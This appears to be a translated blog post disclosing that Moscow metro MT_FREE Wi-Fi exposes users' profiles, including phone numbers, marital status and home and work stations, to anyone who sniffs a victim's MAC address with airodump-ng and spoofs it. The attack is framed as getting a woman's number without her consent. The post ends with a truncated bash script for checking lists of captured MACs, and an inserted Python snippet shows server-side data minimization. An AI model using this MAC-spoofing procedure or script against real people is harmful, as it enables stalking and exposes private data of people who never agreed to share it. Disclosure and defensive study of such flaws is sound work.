How to get the phone number of (almost) any beauty in Moscow, or an interesting feature of MT_FREE

 
Setting
 
The Moscow subway has a wonderful thing: free Wi-Fi.
 
The only thing you need to get online is to enter your phone number. And since a subway ride, though convenient, is often long, almost everyone uses the free network. In this interesting world, we liked the girl at the table opposite.
airodump-ng . Sometimes it's even possible to use the Wi-Fi without looking at ads, if the real owner of the MAC address paid for premium access.
 
Leaking data about yourself
 
But if you are not among the paying Wi-Fi users, you will be greeted by the page auth.wi-fi.ru. Besides advertising, this page serves one interesting JSON document, which contains a lot of information about the currently connected user.
 
Even if you paid for premium access, this page can always be opened by simply typing the address into the browser.
 
A lot of interesting information
{
"dmpSegments":[],
"clicker_status": -?
"gender": "F",
"place": "",
"premium_groups": {
"premium_vip_status": -?
"mosmetro_premium_short_status": -?
"mosmetro_premium_status": 1
},
"line_id": "99",
"family_status": "not married",
"autoapp_status": ?
"premium": true,
"autoapp_user": null,
"age": "4500",
"interests": "307",
"train": "",
"device_price": "",
"mac": "98-00 - ** - ** - b3-66",
"ip": "???.191",
"groups":[
"cppk_basic",
"mosmetro_premium",
"mgt_basic",
"mosmetro_basic"
],
"home_station": "192: 193",
"msisdn": "7925 ***** 03",
"occupation": "student",
"profit": "medium",
"clicker": null,
"tags":[
"yandex.taxi",
"obed",
"coffee",
"analytics_742_k2",
"analytics_784_dns"
],
"avocation": "oywh4JCyQYOMHLy8ZM5AXqMZNhal0pDJl-OqBtuq09T5oBLS44GveLog8sWGm3ILB81zUC0mvW_l51J9ykx1kA ==",
"current_station": null,
"mnc": "02",
"uid": "4fb441e53d0dea858b6abe0dac222c21",
"job_station": "57",
"groups_data": {
"mosmetro_basic": {
"endDate": null,
"state": 1
},
"mosmetro_premium": {
"state": ?
"endDate": null
},
"mgt_basic": {
"state": ?
"endDate": null
},
"cppk_basic": {
"endDate": null,
"state": 1
}
}
}

 
Note that in the real data the phone number is not masked with asterisks.
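
One way the server side could close this leak, as an added example (not code from the article or from the MT_FREE operator): allowlist what a MAC-identified session may see, and audit a response for personal fields. The field names come from the JSON above; PUBLIC_FIELDS, the owner_verified flag and all sample values are assumptions.

```python
import json

# Assumption: a MAC-identified (unauthenticated) session only needs the
# subscription flags to decide whether to show ads.
PUBLIC_FIELDS = {"premium", "groups", "premium_groups", "groups_data"}
# Fields from the article's JSON that identify or profile a person.
SENSITIVE_FIELDS = {
    "msisdn", "mac", "ip", "uid", "gender", "age", "family_status",
    "occupation", "profit", "interests", "tags", "avocation",
    "home_station", "job_station", "current_station", "device_price",
}

def mask_msisdn(msisdn):
    """Keep the first 4 and last 2 digits, like the article's redacted sample."""
    digits = "".join(ch for ch in str(msisdn) if ch.isdigit())
    if len(digits) <= 6:
        return "*" * len(digits)
    return digits[:4] + "*" * (len(digits) - 6) + digits[-2:]

def exposed_fields(profile):
    """Audit check: sensitive keys that carry a value in a response."""
    return sorted(k for k in SENSITIVE_FIELDS
                  if profile.get(k) not in (None, "", [], {}))

def minimize_profile(profile, owner_verified=False):
    """Allowlist the response; keys not listed are dropped by default."""
    out = {k: v for k, v in profile.items() if k in PUBLIC_FIELDS}
    # owner_verified is hypothetical: set only after a check stronger than
    # the MAC address. Even then the number is returned masked.
    if owner_verified and profile.get("msisdn"):
        out["msisdn"] = mask_msisdn(profile["msisdn"])
    return out

# Constructed sample modelled on the article's JSON (all values made up).
SAMPLE = json.loads("""{
  "gender": "F", "family_status": "not married", "premium": true,
  "age": "4500", "mac": "02-00-00-00-00-01", "msisdn": "79250000003",
  "groups": ["mosmetro_premium", "mosmetro_basic"],
  "occupation": "student", "profit": "medium", "home_station": "192:193",
  "tags": ["yandex.taxi", "coffee"], "current_station": null,
  "uid": "00000000000000000000000000000000", "job_station": "57"
}""")

if __name__ == "__main__":
    print("exposed:", exposed_fields(SAMPLE))
    print("served :", minimize_profile(SAMPLE))
```
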
 
And, actually, how to find out the beauty's number
 
I'm almost sure you have all guessed how our scenario will go.
 
Eva really wants to know the phone number of Alice, who is sitting at the table opposite (forbidden love!). Like most people in Moscow who use a phone, Alice also uses the MT_FREE network.
 
Eva watches Alice for a while and learns her MAC using the airodump-ng utility, which is widely available and works on almost any Wi-Fi adapter.
 
Having learned it, she goes into the metro, changes her MAC to Alice's MAC, opens the page auth.wi-fi.ru and gets the coveted number.
 
I'm too lazy to even check this
 
But wait, potential Eva! To simplify the work of going through dozens of MACs from a snack bar in the search for the phone number (that is, in your painstaking study of Wi-Fi security), I made a small script! You can find it at the bottom of the article.
 
To be continued?
 
So far, getting the data about a user works only in the metro, because remotely I have not managed to convince the server that my MAC is not 00:00:00:00:00. Earlier it was possible to pass the MAC in the client_mac parameter, but I have not yet found an equivalent.
 
Disclaimer
 
I reported the vulnerability a week ago (surely someone did so before me; this thing is impossibly obvious) and, having received no response, decided to disclose it here. I apologize for any stating of the obvious in this article.
 
Everything above this disclaimer is written on behalf of a fictional character, and is fiction. His motives do not coincide with mine, and I do this solely for research purposes. And I do not even really understand what to do with the phone number of a beauty who did not give it to me herself.
 
I will not give a manual for airodump-ng, so as not to lower the barrier to entry to zero.
 
Script
 
For those who just want to look
#!/bin/bash
# script for finding userdata from a list of macs.
# for educational purposes only, of course.
! sudo -p "we require sweet root juices to run, please let us in: " echo -n && exit 1
INPUT=$1
SSID=MT_FREE
DEV=wlp1s0
OUTDIR=check-`date +%d-%m-%yT%H:%M:%S`
[ ! -e "$INPUT" ] && { echo 'no input'; exit 1; }
[ -z "$SSID" ] && { echo 'no connection'; exit 1; }
function progress () { echo -ne "